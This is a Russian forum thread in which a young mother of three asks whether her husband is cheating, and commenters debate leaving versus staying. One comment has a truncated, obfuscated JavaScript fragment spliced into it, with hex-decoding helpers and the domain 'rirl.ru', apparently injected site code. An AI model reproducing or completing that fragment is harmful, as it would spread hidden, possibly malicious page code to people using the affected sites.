Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-02 17:29:05 от Гость
Здравствуйте, мне грустно от того, что я не могу общаться с одним парнем, точнее он не хочет что б я была его девушка, потому что я не религиозная и не следую исламу, он сам верующий, наверно вы сейчас подумаете почему я не следую исламу?, он сказал ... Подробнее
Последний комментарий
История : Прощение.
13 минут назад2016-12-03 12:19:21 от Елена Ройтер
22217Арийка, именно так. Мы живём в окружении людей, на которых мы можем себе позволить обидеться, а на которых нет. К последним относятся такие люди как шеф на работе, родственники, спонсор, арендодатель, надёжный сосед, постоянные клиенты и т. п. А есть и такие, на кого мы можем смело обижаться. Это др ... Все комментарии67540
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории о любви
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Лев
23 ноября в 17:13:44
Лев
21 ноября в 22:04:47
Истории о любви - Как это понять??
Истории о любви : Как это понять??     Всем привет. У меня у меня возможно случилась беда а может я просто накручиваю, помогите пож. разобраться казалось бы в мелочи но я очень переживаю. Мне 24 года моему мужу 30. Живем мы вместе 7 лет и у нас 3е детей. Он у меня первый мужчина во всех планах, я у него нет он был женат но не удачно. Первые звоночки начались когда у нас родился первый ребенок. Была у меня подруга с которой в школе вместе были и пошли учиться дальше вместе. Однажды она пришла в гости отмечали праздник какой то я не пила кормила ребенка а вот подруга с мужем выпили. Он решил подвести ее. И приехал домой часа через 4 хотя она рядом живет. На вопрос почему так долго ответил: что заезжал к другу с ней и ее там оставил. На следующий день на учебе она сказала мне что он ее отвез к реке и изнасиловал. Я была в шоке приехала домой собрала вещи, ребенка и хотела уехать домой к родителям в другой город. Но ему видно кто то сказал и он приехал на остановку, не отпустил уехать начали выяснять. Но подруга при нем начала мямлить ничего толком не может сказать. Как она тогда сказала почему при нем не сказала: что испугалась он ей угрожал. Я осталась с ним с этой подругой общались только на учебе. Потом она через год еще говорила что у них было. Что он приехал к ней домой якобы просто прокатиться поговорить в этот день он не ночевал дома. И у них сказала что было этой ночью. Как больно было не передать словами я была беременна 2й раз. Я все думаю что наверно это правда ведь не могла же она знать что его не было дома этой ночью. Он наплел мне что был не работе и это может подтвердить сторож. Надо сказать что эта "подруга" не ровно дышала к мужу не раз она давала намеки что он ей нравится.Поэтому я все надеялась что она просто развести нас. Но недавно произошла еще одно неприятная ситуация. Где то месяц назад я случайно нашла у него в бардачке презервативы мы ими не пользуемся(он не любит) а тут лежат целая пачка! Как сейчас помню 3 штуки закрытые. Я у него спросила зачем они тебе? Мы же не пользуемся? Он сказал что кто та там дал! Я еще удивилась зачем кому то давать презервативы. А сегодня он попросил найти квитанция в машине. Я полезла рыться в бардачок и нашлась та же пачка но... только целых осталось 2 а третий пустой просто обертка от него. Я в шоке спрашиваю а где 3й? Он сказал что их столько и было(но я то помню что их точно было 3 целых) и быстро перевел разговор. Я в шоке что теперь думать может он и правда мне изменяет все эти годы? В интимном плане у нас не все так радужно. 3е детей отнимают все силы и желание. Но все равно через день но бывает! Ему все мало. Что теперь делать как вывести его на откровенный разговор я не знаю. Мне все знакомые говорят как ты живешь с ним? Намекают что без измен он как человек не очень. У меня есть свой дом я то могу уехать только как же дети они все таки любят его. Ну что это может быть? Помогите пожалуйста.
64860
Другие Истории о любви
(73)
Гость
Гость

01 июня 20:00:22
2016-06-01 20:00:22

Автор , сейчас все сбегутся с комментами, ну его, гони в шею.... я вам советую подумайте хорошо, все таки у вас трое детей и никто их не заменит так как родной папа ..

Ответить
Поддерживаю Да1 / Нет0
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
01 июня 20:12:19
2016-06-01 20:12:19

Да можно конечно наплевать на свою гордость включить холодный разум и жить с мужем который изменяет, НО, обеспечивает вас и детей, и без него вам придется трудно хоть и в своем доме. Взамен уже ни кто не осудит вас за измену ему. Только есть одна беда, не все умеют сдерживать эмоции и не палиться как ваш мудак муж, который не особо то и осторожничает.

Ответить
Поддерживаю Да1 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
01 июня 20:16:05
2016-06-01 20:16:05

БесШаБаШнЫй ЭлЬф )), а что тут думать: жить с человеком, которого тихо ненавидишь, это значит подорвать свое здоровье. И кто будет заботиться о детях, если мама заболеет? Это надо иметь железные нервы и огромное желание принести себя в жертву детям, дожидаясь своего часа Х. К примеру, у меня знакомая, тоже с 3-мя детьми, героически дождалась, когда младшенькому стукнет 18, и сразу побежала подавать на развод. Теперь живет счастливо, и, кстати, болеет намного меньше, чем раньше, несмотря на преклонный возраст. И тем не менее у двоих из ее 3-х сыновей личная жизнь сложилась неудачно. Так что не факт, что ее жертва того стоила.

Ответить
Поддерживаю Да2 / Нет0
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
01 июня 20:23:58
2016-06-01 20:23:58

Farba, Дело даже не в геройстве, а в вопросе потянет ли девушка, одна, аж троих детей, тут одного стараются вдвоем и то натянуто выходит и многого себе не можешь позволить, а там трое!!!! Чем кормить это одна проблема, а вот одеть и обуть, да еще и всякие гаджеты компьютеры и образование и игрушки, ведь ни кто не хочет что бы дети нуждались или страдали от того что у кого-то есть а у них нет.

Ответить
Поддерживаю Да1 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Allegro
21105 Allegro
allegro offline
Репутация : 139463
Комментариев 1455 11
01 июня 20:23:59
2016-06-01 20:23:59
Подруга точно какая-то странная. Путается в показаниях. Автор, совет вам на будущее:никаких подруг в доме. Пожалуйста, с подругой в кафе, по магазинам. Какая бы ни была подруга, как бы не были вы близки, помните, что это опасный для вашей семьи человек. Во-первых вы с ней делитесь и подчас она в курсе ваших взаимоотношений с мужем, некоторые подруги знают вашего мужа оочень хорошо, что он любит, что его не устраивает в вас и т. п. Этим легко можно воспользоваться и увести мужчину. Я не говорю, что дружить нельзя, наоборот. Но ваш дом должен быть закрыт от подруг. По поводу мужа. Нужен разговор.. Откровенный, по поводу интимной стороны ваших отношений. Можно искать следствие-наличие любовниц. А можно пытаться найти причину, если таковая имеется
Ответить
Поддерживаю Да1 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
01 июня 20:26:42
2016-06-01 20:26:42

Вам всего 24 года, не ставьте на себе крест. какие еще докозательства вам нужны? Хотите своими глазами увидеть?!

Ответить
Поддерживаю Да3 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
01 июня 20:28:17
2016-06-01 20:28:17

Allegro, согласна что подругам нефиг делать дома кода муж не на работе, но и если захочет изменить, то и без подруг справится.

Ответить
Поддерживаю Да3 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
Allegro
21105 Allegro
allegro offline
Репутация : 139463
Комментариев 1455 11
01 июня 20:32:45
2016-06-01 20:32:45

Ночная Фурия, конечно есть патологические "потаскуны"{#}

Ответить
Поддерживаю Да3 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
Гость
Гость

01 июня 20:39:32
2016-06-01 20:39:32

Автор ну уйдете, или он ... без разницы, приведете в дом чужого мужика, ну будет он первое время хорошим и внимательным, ну потом тоже начнёт в чужой огород смотреть... и начнёт изменять, а так хоть у детей рядом родной отец будетп, чужой все равно так не будет любить

Ответить
Поддерживаю Да0 / Нет4
Кристиша
Кристиша

01 июня 22:17:00
2016-06-01 22:17:00
Позабавила фраза 24 летней многодетной матери: мы не пользуемся презервативами, он их не любит"))) Судя по вашему рассказу, вы давно с рогами ходите. История про подругу вообще аховая. Не знаю вообще, то ли наивной вас на назвать, то ли как.
Ответить
Поддерживаю Да4 / Нет0
Бельчонок777
17586 Бельчонок777
Бельчонок777 offline
Репутация : 15633
Комментариев 164 5
01 июня 22:17:07
2016-06-01 22:17:07

БесШаБаШнЫй ЭлЬф )), это конечно да - не заменит никто, но с другой стороны всё равно это рано или поздно случится... только для чего расстрачивать себя и свои нервы.... конечно не рубить с плеча, мало ли... но и слепо верить тоже не нужно... просто время идет... ей всего пока 24, еще успеет найти действительное семейное счастье , а можно и правда ждать , как сказали выше, когда последнему ребенку исполнится 18 и тогда развестись, но стоит ли тратить лучшие свои годы на такого мужа... да и дети хотят видеть счастливую маму, а не темными кругами под глазами от выплаканных слез...

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да0 / Нет0
Ли
Ли

01 июня 22:17:31
2016-06-01 22:17:31
Автор, вы очень отважный человек, раз решились нарожать кучу детей в таком нежном и глупом возрасте. Мне обидно, что многие девушки мечтают о принцах, которым они достанутся девственницами. Ни одного мужчину это рядом с вами в прямом смысле не удержит. Мужчины подобного склада хотят жену, пардон, "целку", чтоб у нее ни мыслей ни желания не было сравнивать своего мужа с другими мужчинами. И пока неопытная жена мечется среди детей, муж спокойно на правах альфы бегает и разносит свой мускус по городу. Я искренне вам сочувствую, правда( крепитесь! Уходить страшно, реальность не на вашей стороне. Поэтому вам необходимо хотя бы попытаться создать себе какой-никакой крепкий тыл. Требовать уважения к себе, потихоньку готовясь к худшему. Я буду держать за вас кулачки!
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

01 июня 22:18:11
2016-06-01 22:18:11
Извините, за некорректный вопрос, а куда вы рожаете?Ведь первые звоночки у вас начались, когда вы были беременны в первый раз, т. е Вы уже давно догадываетесь, что муж вам не верен и продолжаете рожать?
Ответить
Поддерживаю Да3 / Нет0
печалька
печалька

01 июня 23:36:23
2016-06-01 23:36:23
Всем спасибо за советы. да действительно я очень наивный доверчивый человек всему верю что мне скажут, не могу различить где правда где ложь. ОН этим пользуется.. Да действительно мир сейчас жесток мне с 3мя детьми будет сложно пока наверно поживу и дальше ничего не видя и не слыша..
Ответить
Поддерживаю Да0 / Нет0
Читательница
14629 Читательница
Читательница online
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16100 6
02 июня 02:33:20
2016-06-02 02:33:20

Автор, да какой откровенный разговор? Он не признается, он же не враг себе! Так что тут нужно смотреть на факты, а не ждать признаний, которых скорее всего не будет.

Все было понятно еще давно, а вы решились и на второго ребенка, а потом и на третьего. Да, я считаю, что он вам изменяет, а презервативы в машине и уж тем более то, что одного нет, а валяется пустая пачка, при том, что вы ими не пользуетесь, говорят о многом. Я думаю, что он вам изменяет, увы. А что он еще мог сказать? Конечно, он сказал, что ему дал кто-то, а потом, когда вы его прижали второй раз, то сказал, что столько и было их штук, а это просто у вас с памятью проблемы.

Вам самой все же следовало пользоваться презервативами, тогда не было бы так сложно, да и сейчас не поздно начать пользоваться презервативами, чтоб у вас не появился четвертый ребенок, что вполне вероятно, ведь трое же появились, да и стоит задуматься, что шатаясь по бабам он вам может принести заразу и заразить вас, а презервативы хоть как-то вас уберегут, вы же свечку то там не держите, может он не всегда ими предохраняется, когда с бабами там зажимается. Это все очень серьезно и страшно, не будьте беспечны, думайте о своем здоровье, ведь у вас дети!

Ответить
Поддерживаю Да0 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Читательница
14629 Читательница
Читательница online
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16100 6
02 июня 02:39:46
2016-06-02 02:39:46

Allegro, значит он кобель, если и с подругой станет, а если он не захочет, то никакая подруга его не уложит. В конце концов в любой ситуации есть плюс - если даже изменит, то подруга избавит от такого бабника и освободит место для нормально парня. Да и что подругу обвинять? Если будет желание, то он найдет и в другом месте.

Я лично не против подруг в доме, но она действительно должна быть подругой. А так можно всех шарахаться, а мужа только на цепи выпускать, а то мало ли что... Да и тогда сестер тоже домой пускать не нужно, а то бывает с сестрами изменяют или даже с матерями, так и до паранойи не далеко уже!

Ответить
Поддерживаю Да1 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
О-ля-ля
20862 О-ля-ля
О-ля-ля offline
Репутация : 33459
Комментариев 238 4
02 июня 09:45:40
2016-06-02 09:45:40

Я представила себе эту картину, как Вы находите начатую пачку презервативов, спрашиваете, куда делся 3й, и в итоге получаете такую "детскую" отмазку, типо так и было... И еще не уверены, сомневаетесь, изменяет или нет{#} Более точным доказательством будет только видео со всеми подробностями... Автор, он Вас до такой степени не уважает, что даже не потрудился следы замести!Я в шоке!Честно... Ваш муж, если эту безсовестную особь мужского пола можно так назвать, целиком и полностью уверен, что вы от него уже никуда не денетесь! И возможно он прав, т. к. с тремя детьми сильно не разгонишься... Я бы посоветовала, снимать очки, принять правду, такую мерзкую и противную, но правду, начать уважать себя и потихоньку готовить пути к отступлению. Не для того Вас мама рожала, чтоб Вас ни во что не ставили, не уважали, не любили и чтоб бы рогами потолок задевали!

Ответить
Поддерживаю Да2 / Нет0
Никто не может сделать вас счастливыми – только вы сами способны сделать это. Бейонсе
Allegro
21105 Allegro
allegro offline
Репутация : 139463
Комментариев 1455 11
02 июня 11:16:39
2016-06-02 11:16:39

Читательница , этот совет был для автора, по этой ситуации. А кого вы там приглашаете домой, это ваше личное дело.

Ответить
Поддерживаю Да0 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 11:36:10
2016-06-02 11:36:10

Ну считай считай презики в его бардачке, а он еще лапши навешает{#}. Нафиг ты ему ТРОИХ ДЕТЕЙ НАРОЖАЛА??? Сама уже при первом ребенке стала замечать, что что-то не то... Думала ребенком удержать???? Тут и подозревать нечего, и пеньку понятно, что изменяет и причем открыто! А вы себя святой возомнили {#}??? Не стерпится и не слюбится! Если есть где жить, уходи... Будет детей навещать, если конечно они ему нужны... Но судя по рассказу, как-то не очень вы ему дороги.... А подружку свою шли куда подальше... Обули они тебя {#}

Сейчас ребенок- дорогое удовольствие, а вы троих ему наплодили... Вы думаете как их содержать дальше???

Ответить
Поддерживаю Да0 / Нет1
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Allegro
21105 Allegro
allegro offline
Репутация : 139463
Комментариев 1455 11
02 июня 11:43:50
2016-06-02 11:43:50

Я в шоке от комментов. "Зачем рожали?" и это пишут женщины.. Автор не спрашивает, что ей делать с детьми которых она нарожала.

Ответить
Поддерживаю Да1 / Нет1
Кому-пожар,кому-погреться(рус.пословица)
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 11:48:33
2016-06-02 11:48:33

Allegro, Рожают детей, когда в семье все хорошо, а не когда муж шалавится по разным сторонам, дети все чувствуют и все замечают!!!!

Ответить
Поддерживаю Да3 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 11:51:39
2016-06-02 11:51:39

Allegro, Я ведь не говорила ей, чтобы детей бросала или с отцом оставила, что сделано то сделано, просто думать головой нужно, от кого детей иметь хочешь, а не просто настрогать их и жить перебиваясь с копейки на копейку... Детей родить не проблема, хотя и это тоже стало проблемой, а воспитать проблема!

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Allegro
21105 Allegro
allegro offline
Репутация : 139463
Комментариев 1455 11
02 июня 11:53:14
2016-06-02 11:53:14

Дорогой автор, по вашей истории выходит, что у мужа есть какие-то интрижки, но что и как не мы , не вы не знаете. Да и не надо вам это знать, уже достаточно и того, что известно. В таких ситуациях есть два варианта. Простить или оставить все как есть. Никто вас не осудит, если вы простите. Так же никто вас не осудит, если вы уйдете. Решать только вам. Если вы соберетесь уходить, то продумайте "пути отступления" заранее, как и на что вы будете жить, как решится вопрос с алиментами. Дом у вас есть, это уже пол беды. Сад и школа для детей, кто сможет посидеть с ними, выход на работу и т. п. Если вы решаете остаться с мужем, то вам нужен разговор. Во-первых повторюсь поиск ваших проблем в интимной сфере. Во- вторых вы должны ему сказать:"Дорогой, любимый муж, если ты хоть немного уважаешь меня, огради меня пожалуйста от своих похождений и их последствий. Я как любящая жена не должна этого видеть". И обязательно выходите на работу, приобретайте хоть какую-то самостоятельность по возможности. Искренне желаю счастья

Ответить
Поддерживаю Да0 / Нет1
Кому-пожар,кому-погреться(рус.пословица)
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 12:00:02
2016-06-02 12:00:02

Allegro, Блииин... я в шоке... это ж надо как себя не уважать и отпускать мужа к другой на сторону... Дорогой муж, если ты меня уважаешь, то огради меня от своих похождений!!!! {#} По ходу, вы себя не уважаете и вам не противен, тот факт, что муж с другой на стороне спит.... {#} Это мерзко...

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Allegro
21105 Allegro
allegro offline
Репутация : 139463
Комментариев 1455 11
02 июня 12:02:38
2016-06-02 12:02:38

ника777, видимо у вас нет детей и вы очень молоды

Ответить
Поддерживаю Да0 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 12:05:17
2016-06-02 12:05:17

Allegro, Ошиблись, я замужем и есть сын 4 года!

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Allegro
21105 Allegro
allegro offline
Репутация : 139463
Комментариев 1455 11
02 июня 12:05:40
2016-06-02 12:05:40

ника777, оставьте номер будете помогать автору когда она уйдет{#}ведь это все мерзко)))в интернетах то просто писать, да нелегко сделать

Ответить
Поддерживаю Да0 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 12:10:42
2016-06-02 12:10:42

Allegro, А вы несогласны со мной? Вас это не колышет, если вы знаете- муж гуляет, и спокойно ему об этом скажите - гуляй, но чтобы я не знала... {#} Куда мир катится... Можно сделать все, если сильно захотеть, если она хочет положить на алтарь свою жизнь и всю жизнь прожить ради детей, чего не советую, это лично, мое мнение, поскольку, ради детей нельзя жить- дети не раствор, чтобы скреплять фундамент семейной жизни родителей, дети думаете, не будут страдать? Она еще может обрести свое счастье...

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Allegro
21105 Allegro
allegro offline
Репутация : 139463
Комментариев 1455 11
02 июня 12:16:23
2016-06-02 12:16:23

ника777, тогда почитайте ее коммент выше, какой вывод она делает. Она склоняется к тому, чтобы остаться. да-да в этой "мерзости" как вы говорите. И тут уже приходится исходить из того, что есть. Ей нужно как-то оградится от этого всего. Сейчас она не готова уйти. Я лично ее не осуждаю. Мы не знаем нюансы, не знаем ее финансовое положение. Как поступлю я или как поступите вы, это здесь не имеет значения. Я ведь предложила 2 варианта, возможно когда-нибудь она придет к первому варианту, возможно когда дети станут старше, возможно когда она сможет выйти на работу

Ответить
Поддерживаю Да0 / Нет0
Кому-пожар,кому-погреться(рус.пословица)
Гость
Гость

02 июня 12:18:09
2016-06-02 12:18:09
гнать в шею его! пусть ахается по углам. вот когда читаю такое, и главное, ой ой что делать, дети его любят, а детям всего-то несколько месяцев от роду, извините, смех да и только! и что, дети любят его? пусть любят! вы же не запрещаете им папу любить. могут любить по выходным, или как договоритесь. но не нужно только сразу детей приплетать если сами не можете решиться послать его подальше
Ответить
Поддерживаю Да1 / Нет0
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
02 июня 12:20:51
2016-06-02 12:20:51

ника777, думаю автора останавливает материальный вопрос. Как я поняла Она не работает плюс 3е детей...

Ответить
Поддерживаю Да1 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 12:25:13
2016-06-02 12:25:13

печалька, Глупышка, не закапывай себя в землю раньше времени, ты что бабка 50 летняя, которая жизнь прожила, и не поняла, что такое настоящее счастье... Он вас не уважает, тогда зачем так жить??? Время тратишь зря, будет у тебя счастье... Думай о детях, прежде всего... Вот так всю жизнь проживешь, а потом как ведро холодной воды на голову выльешь себе, и все сразу поймешь, что нужно было делать, а чего нет! Тебе нравится быть в роли жертвы???? А когда дети подрастут, они ведь все понимать будут, не утаишь ничего, ну и какой авторитет ты среди них будешь??? Если ты себя не уважаешь совсем... Надеешься на авось..

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 12:26:04
2016-06-02 12:26:04

Allegro, Да совсем глупое решение! Роль жертвы на себя примерила и все...

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 12:31:05
2016-06-02 12:31:05

Dead end, Она отчаялась, и запуталась... Если ей есть где жить, родители должны ведь помочь ей! Из любой проблемы есть решение, глаза страшат- а руки все делают!

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
02 июня 12:50:02
2016-06-02 12:50:02

ника777, знаете не у всех "нормальные" родители, которые помочь могут. Встречала таких что не в курсе жив ли их ребенок...

Ответить
Поддерживаю Да2 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Дракон в яблоках
21249 Дракон в яблоках
Дракон в яблоках offline
Репутация : 974
Комментариев 21 0
02 июня 12:55:38
2016-06-02 12:55:38

Милый автор, вы так молоды, наивны, в этом есть некая прелесть, о вас хочется заботиться.

Что касается вашей ситуации, мне кажется Allegro права, обдумайте все. Как уйдете, как и за что будете жить, подготовьте себе плацдарм. У вас есть родители? Какие отношения с ними? Они помогут?

Какие отношения с родителями мужа?

Дом у вас свой есть и это замечательно, осталось позаботится о работе, подготовится к уходу и обязательно найти в себе силы и начать жизнь с чистого листа. Вам придется, хотя бы попытается стать самостоятельной, самодостаточной, сильной женщиной.

В противном случае, вы потеряете столь драгоценное время, потеряете годы молодые, а счастье с мужем изменником разве возможно? С годами детки подрастут, и счастья им нет, если мама не счастлива. Я искренне считаю, что пора взрослеть, брать себя в руки, подготовится и уходить. Подавать на развод, отсудить у мужа все что возможно. И конечно же, алименты!

Оставаться с мужем, который изменяет, только потому, что он отец деткам, этого мало!

Такое может посоветовать только тот, у кого самого «рыльце в пушку». Тот, кто привык использовать женщин, тот для кого женщина всегда должна. Ну, либо самодур!

Ответить
Поддерживаю Да2 / Нет0
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 13:54:31
2016-06-02 13:54:31

Dead end, К сожалению, бывает... Но жить ради детей и терпеть его предательства - это не выход, будто себя заживо похоронить!

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
02 июня 14:10:22
2016-06-02 14:10:22

Я тоже думаю, что если и оставаться с таким мужем, то временно, пока не будет подготовлен плацдарм для переезда. А в ответ на аргумент "дети его любят" мне всегда хочется задать вопрос: "А папа-то их любит? Заботится о них? Уделяет им время?" Если нет, то он точно не нужен.

Ответить
Поддерживаю Да2 / Нет0
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 14:12:24
2016-06-02 14:12:24

Farba, На счет плацдарма, могу поспорить, неизвестно сколько он будет готовится, то ли месяц, то ли год... Так и будет откладывать переезд пока не состарится...

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Дракон в яблоках
21249 Дракон в яблоках
Дракон в яблоках offline
Репутация : 974
Комментариев 21 0
02 июня 14:18:01
2016-06-02 14:18:01

ника777, посмотрить на счет чего конкретно? Только автору известно сколько времени ей на это понадобится. Кому то дня достаточно, а кому и года мало.

Ответить
Поддерживаю Да1 / Нет0
Дракон в яблоках
21249 Дракон в яблоках
Дракон в яблоках offline
Репутация : 974
Комментариев 21 0
02 июня 14:19:59
2016-06-02 14:19:59

ника777, хотела сказать "поспорить", ошибочка вышла :)) Извините.

Ответить
Поддерживаю Да0 / Нет0
Bert
20913 Bert
Bert offline
Репутация : 122689
Комментариев 1156 1
02 июня 14:25:43
2016-06-02 14:25:43

Автор, то что вам изменяет муж, это очевидно. Вы сами это понимаете, но вам легче думать что подруга хочет вас развести имея к вашему мужу симпатию, чем понять что даже не имея подруги, он бы это делал с другими. Дело не в подруге, не в вас а в том, что муж гулял, гуляет и будет гулять. Только вам самой решать будите ли вы с этим мириться или нет. Если вы принимаете, так как есть, тогда и не стоит не чего выяснять. Живите, как не в чём не бывало. У вас трое детей, не буду писать о чём вы думали, когда рожали. Ведь вы и раньше подозревали в его изменах. Но на даный момент у вас их трое. Согласен, что ни кто не заменит им отца, но бывают исключения когда не родные больше дают детям чем родные. Так же не могу согласиться, что женщина должна позволять себя унижать, только потому что у неё дети. В моём понятие измена это тоже в своём плане унижения. Не думаю, что какой либо нормальный мужчина согласен был бы жить с женой, которая изменяет ради детей. Хотя может есть конечно исключение.

Ответить
Поддерживаю Да0 / Нет0
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
02 июня 14:48:39
2016-06-02 14:48:39

ника777, согласна. Я бы послала еще после первого раза, но я не автор

Ответить
Поддерживаю Да1 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 14:56:38
2016-06-02 14:56:38

Дракон в яблоках, Поспорить по поводу подготовки плацдарма, с ним пока жить... будь на ее месте, ничего бы не ждала.

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 15:01:57
2016-06-02 15:01:57

Дракон в яблоках, По-моему это хуже всего, жить рядом с человеком, и понимать, что ему на тебя все равно... Она сама ставит себе эти предлоги лишь бы по дольше по быть с ним... И опять, зачем??? Лучше уже ей не станет, доверять ему не сможет как раньше, а жить с ним как на пороховой бочке - это ей видимо нравится!

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Farba
11357 Farba
Farba offline
Репутация : 123226
Комментариев 1521 1
02 июня 15:04:32
2016-06-02 15:04:32

ника777, так легко говорить, если есть один ребенок, а у автора их трое. Может, сейчас им денег даже на проезд всем не хватит до того места, где у автора есть дом. А дальше надо устраивать детей в ясли, сад, школу, искать работу и т. д. На все это нужно время и определенная сумма на жизнь. Хорошо, если родители помогут, а если нет? Тогда надо рассчитывать только на себя. В общем, переезд - это непросто и затратно, к нему надо подготовиться.

Ответить
Поддерживаю Да0 / Нет0
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 15:10:56
2016-06-02 15:10:56

Дракон в яблоках, По-моему это хуже всего, жить рядом с человеком, и понимать, что ему на тебя все равно... Она сама ставит себе эти предлоги лишь бы по дольше по быть с ним... И опять, зачем??? Лучше уже ей не станет, доверять ему не сможет как раньше, а жить с ним как на пороховой бочке - это ей видимо нравится!

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 15:11:24
2016-06-02 15:11:24

Ой второй раз отправила текст...

Ответить
Поддерживаю Да0 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
ника777
21248 ника777
Ника777 offline
Репутация : 115327
Комментариев 2137 3
02 июня 15:19:50
2016-06-02 15:19:50

Farba, А что подруг, друзей нет у нее??? Вообще надо было думать и рассчитывать, что прокормишь троих детей! У меня есть один сын, и второго ребенка пока не хочу, в одного буду душу вкладывать, да по-моему вряд ли он будет, работа у меня есть и муж работает, но пока не могу позволить себе второго, потому что с финансами напряжно. На вещи реально смотреть надо, а недается на авось... Был бы один ребенок, она бы работать пошла, может и смогла бы съехать от него... А так она связана по рука и ногам, и он это прекрасно знает, что она с тремя детьми от него не уйдет, а так и будет жить в качестве прислуги "подай-принеси"... С родителями надо говорить, и с его и ее!

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Штучка
21311 Штучка
Штучка online
Репутация : 41284
Комментариев 965 0
02 июня 15:30:34
2016-06-02 15:30:34
